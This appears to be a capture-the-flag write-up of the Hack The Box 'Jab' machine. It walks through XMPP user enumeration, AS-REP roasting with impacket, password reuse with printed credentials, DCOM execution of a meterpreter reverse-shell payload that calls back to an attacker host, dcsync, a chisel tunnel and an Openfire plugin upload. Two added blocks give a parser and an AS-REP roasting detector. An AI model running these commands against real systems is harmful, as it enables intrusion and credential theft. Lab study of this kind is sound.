HTB-Jab

Port scan and service exploitation

XMPP - 5269, 5270 (tcp)

Download a client

XMPP is a "universal messaging standard". It allows "XMPP-compatible software to join the XMPP messaging network".

[screenshot: image-20250517223432755]

First register a new account and log in with it, then use the Service Discovery plugin to gather information.

You can see there are three more subdomains.

Then click "Search for users" in the list, and also open the XML console plugin.

```xml
<iq type='set'
    from='ddl1@jab.htb'
    to='search.jab.htb'
    id='search4users'
    xml:lang='en'>
  <query xmlns='jabber:iq:search'>
    <last>*</last>
  </query>
</iq>
```

This returns every matching user; then write a script to extract the names.

```python
import re

# File paths (input and output)
input_file = '2.txt'
output_file = '3.txt'

# Read the saved search result
with open(input_file, 'r', encoding='utf-8') as f:
    content = f.read()

# Extract the local part of every jid='user@jab.htb' attribute
usernames = re.findall(r"jid='(.*?)@jab\.htb'", content)

# Write one username per line to 3.txt
with open(output_file, 'w', encoding='utf-8') as f:
    for user in usernames:
        f.write(user + '\n')

print(f"Extraction complete: {len(usernames)} usernames saved to {output_file}")
```
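The regex above keys on the quote style of one particular dump; a more robust way to read a `jabber:iq:search` result is to parse the stanza as XML and walk the `<item jid='...'>` elements that XEP-0055 defines. The following is an added example written for this page, not the author's script: it assumes the result stanza shape shown in the constructed sample (the `from`/`to` values and user names are made up), restricts hits to the expected domain, and also records which profile fields (first, last, nick, email) the search service hands out, which is what an administrator auditing the service's exposure would want to see.

```python
import xml.etree.ElementTree as ET

SEARCH_NS = "jabber:iq:search"

# Constructed sample result stanza (XEP-0055 shape); names and JIDs are invented.
SAMPLE_RESULT = """<iq type='result' from='search.jab.htb' to='ddl1@jab.htb' id='search4users'>
  <query xmlns='jabber:iq:search'>
    <item jid='alice@jab.htb'>
      <first>Alice</first><last>Smith</last><nick>alice</nick><email>alice@jab.htb</email>
    </item>
    <item jid='bob@jab.htb'>
      <first>Bob</first><last>Jones</last><nick>bob</nick><email/>
    </item>
    <item jid='svc_bot@jab.htb'/>
    <item jid='eve@other.example'><nick>eve</nick></item>
  </query>
</iq>"""


def parse_search_result(stanza: str, domain: str = "jab.htb"):
    """Return one dict per user exposed by the search service for `domain`."""
    root = ET.fromstring(stanza)
    if root.tag != "iq":
        raise ValueError("not an IQ stanza")
    if root.get("type") == "error":
        # The service refused the query; surface that instead of returning nothing.
        err = root.find("error")
        raise ValueError("search returned an error: %s" % (list(err)[0].tag if err is not None and len(err) else "unknown"))
    if root.get("type") != "result":
        raise ValueError("not an IQ result stanza")

    query = root.find("{%s}query" % SEARCH_NS)
    if query is None:
        raise ValueError("no jabber:iq:search query element")

    users = []
    for item in query.findall("{%s}item" % SEARCH_NS):
        jid = item.get("jid", "")
        if "@" not in jid:
            continue
        local, _, jid_domain = jid.partition("@")
        if jid_domain.lower() != domain.lower():
            continue  # ignore results from other domains
        # Child elements inherit the query namespace; strip it to get first/last/nick/email.
        fields = {child.tag.split("}")[-1]: (child.text or "").strip() for child in item}
        users.append({"username": local, "jid": jid, **fields})
    return users


def exposed_field_summary(users):
    """Count how many users expose each profile field non-empty (audit view)."""
    summary = {}
    for u in users:
        for key in ("first", "last", "nick", "email"):
            if u.get(key):
                summary[key] = summary.get(key, 0) + 1
    return summary


if __name__ == "__main__":
    found = parse_search_result(SAMPLE_RESULT)
    for u in found:
        print(u["username"], u.get("email", ""))
    print("exposed fields:", exposed_field_summary(found))
```

Because the parser reads attributes rather than matching quote characters, it works unchanged on a dump that uses double quotes, and the domain filter keeps an unrelated `jid` from slipping into the list.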

With that as a wordlist, start checking.

Accounts that do not require Kerberos pre-authentication

```bash
impacket-GetNPUsers jab.htb/ -dc-ip dc01.jab.htb -usersfile 3.txt -outputfile 4.txt -format hashcat
```

Then crack the output with john.
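From the defender's side, a `GetNPUsers` run over a user list leaves a distinctive trace on the domain controller: a burst of Kerberos TGT requests (Security event 4768) with Pre-Authentication Type 0 that succeed (Status 0x0), typically with RC4 (0x17) ticket encryption, all from one client address for many different accounts. The following is an added example, not part of the original writeup: it runs that logic over constructed, flattened `key=value` sample events (the account names and the 192.0.2.10 client address are invented) and also lists which accounts answered without pre-authentication at all, since each of those is a configuration weakness regardless of whether a spray is under way.

```python
from collections import defaultdict

# Constructed sample events in flattened key=value form. Real 4768 events carry
# these fields under the names TargetUserName, PreAuthType, TicketEncryptionType,
# IpAddress and Status; 4769 is a service-ticket request and is not relevant here.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=user1 PreAuthType=0 TicketEncryptionType=0x17 IpAddress=192.0.2.10 Status=0x0",
    "EventID=4768 TargetUserName=user2 PreAuthType=0 TicketEncryptionType=0x17 IpAddress=192.0.2.10 Status=0x0",
    "EventID=4768 TargetUserName=user3 PreAuthType=0 TicketEncryptionType=0x17 IpAddress=192.0.2.10 Status=0x0",
    "EventID=4768 TargetUserName=user4 PreAuthType=0 TicketEncryptionType=0x17 IpAddress=192.0.2.10 Status=0x0",
    # Normal logons: PA-ENC-TIMESTAMP (2) and PKINIT (15) pre-authentication, AES256 tickets.
    "EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=192.0.2.50 Status=0x0",
    "EventID=4768 TargetUserName=bob PreAuthType=15 TicketEncryptionType=0x12 IpAddress=192.0.2.51 Status=0x0",
    "EventID=4769 TargetUserName=alice TicketEncryptionType=0x12 IpAddress=192.0.2.50 Status=0x0",
    # Unknown principal (0x6): no AS-REP was issued, so it does not count as a roastable hit.
    "EventID=4768 TargetUserName=nosuchuser PreAuthType=0 TicketEncryptionType=0x17 IpAddress=192.0.2.10 Status=0x6",
]


def parse_event(line: str) -> dict:
    """Split one flattened event line into a field dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def is_asrep_issued_without_preauth(ev: dict) -> bool:
    """True when a TGT (and thus a crackable AS-REP) was issued with no pre-auth."""
    return (ev.get("EventID") == "4768"
            and ev.get("PreAuthType") == "0"
            and ev.get("Status") == "0x0")


def accounts_without_preauth(lines) -> set:
    """Every account that obtained a TGT without pre-authentication (a config weakness)."""
    return {parse_event(l)["TargetUserName"] for l in lines
            if is_asrep_issued_without_preauth(parse_event(l))}


def find_asrep_roasting(lines, threshold: int = 3) -> dict:
    """Map client IP -> sorted accounts, for clients that pulled >= threshold
    distinct no-preauth AS-REPs. A single account is a weak setting; many
    distinct accounts from one client looks like a scripted run over a list."""
    by_source = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_asrep_issued_without_preauth(ev):
            by_source[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_source.items() if len(users) >= threshold}


if __name__ == "__main__":
    print("accounts without pre-auth:", sorted(accounts_without_preauth(SAMPLE_EVENTS)))
    for ip, users in find_asrep_roasting(SAMPLE_EVENTS).items():
        print(f"possible AS-REP roasting from {ip}: {users}")
```

The fix for the accounts it lists is to clear "Do not require Kerberos preauthentication" on them, and, where legacy clients permit, to drop RC4 so that any remaining AS-REP is AES-encrypted and far slower to crack.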

Obtained during enumeration:

```bash
netexec smb jab.htb -u jmontgomery -p 'Midnight_121'
```

Then gather information with the new credentials.

[screenshot: image-20250517231445131]

[screenshot: image-20250517231557902]

Below that there is a hash, and at the end of it the password.

```bash
netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw'
```

WinRM does not work.

Run BloodHound with the credentials.

[screenshot: image-20250518204736911]

ExecuteDCOM

Test

Start a listener:

```bash
tcpdump -ni tun0 icmp
```

  • -n: do not resolve hostnames/IPs (faster, shows raw IP addresses)
  • -i tun0: specify the interface

Send the probe:

```bash
impacket-dcomexec jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'ping 10.10.16.14' -silentcommand -object MMC20
```
Exploitation

```
use exploit/multi/script/web_delivery
set target 2 // PowerShell
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
run
```

Then run the generated payload with:

```bash
impacket-dcomexec jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'powershell.exe -nop -w hidden -e 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' -silentcommand -object MMC20
```

```
lsadump::dcsync /domain:jab.local /user:Administrator
```

Privilege escalation

Check processes

[screenshot: image-20250518210836255]

Check ports

[screenshot: image-20250518211045264]

```
./chisel_1.10.1_windows_amd64 client 10.10.16.14:8050 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091
```

Log in with the administrator account

Upload a malicious plugin

Under "Server" -> "Server Settings" there is now a "Management Tool" option:

I will follow the instructions on GitHub and enter "123". The plugin has an options dropdown:

Openfire - 7070, 7443 (tcp)

References